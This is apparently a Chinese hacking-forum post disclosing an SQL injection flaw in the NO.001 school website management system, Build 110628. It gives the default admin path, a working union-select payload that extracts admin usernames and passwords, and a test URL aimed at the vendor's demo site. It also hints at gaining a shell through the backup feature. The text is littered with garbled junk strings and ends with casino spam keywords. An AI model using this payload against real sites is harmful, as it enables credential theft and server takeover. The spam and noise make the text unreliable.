NO.001中学网站管理系统 Build 110628 注入漏洞

NO.001中学网站管理系统功能模块:
1.管理员资料:网站的基本信息设置（校长邮箱等）,数据库备份,用户管理、部门及权限管理等
2.学校简介:一级分类，可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
3.文章管理:二级分类,动态添加各相关频道（图片视频频道、学校概况频道除外）文章等信息
4.视频图片管理:一级分类,动态添加视频或者图片等信息
5.留言管理:对留言,修改,删除、回复等管理
3 z- N7 C. p! [( d. D6.校友频道:包括校友资料excel导出、管理等功能
* M- ^! N( U5 N4 o8 ]7.友情链接管理:二级分类，能建立不同种类的友情链接显示在首页
默认后台:admin/login.asp
" K) M- T6 `6 O4 t# f7 R' f% H官方演示:http://demo.001cms.net
" {# r# S, S% q1 F% a: w+ K源码下载地址:http://down.chinaz.com/soft/30187.htm
EXP:
# y  r( Q# C3 l8 _; A/ Dunion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
5 z3 d2 e0 V5 j) D0 rgetshell:后台有备份，你懂的
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多，我在这里就不说了。
1 t" @) H1 l2 K1 H3 Q6 x-------------------------------------------------------------------------------------------------------------------------------------------------------------------------

casino slots
online casino canada
new online casino
slot machines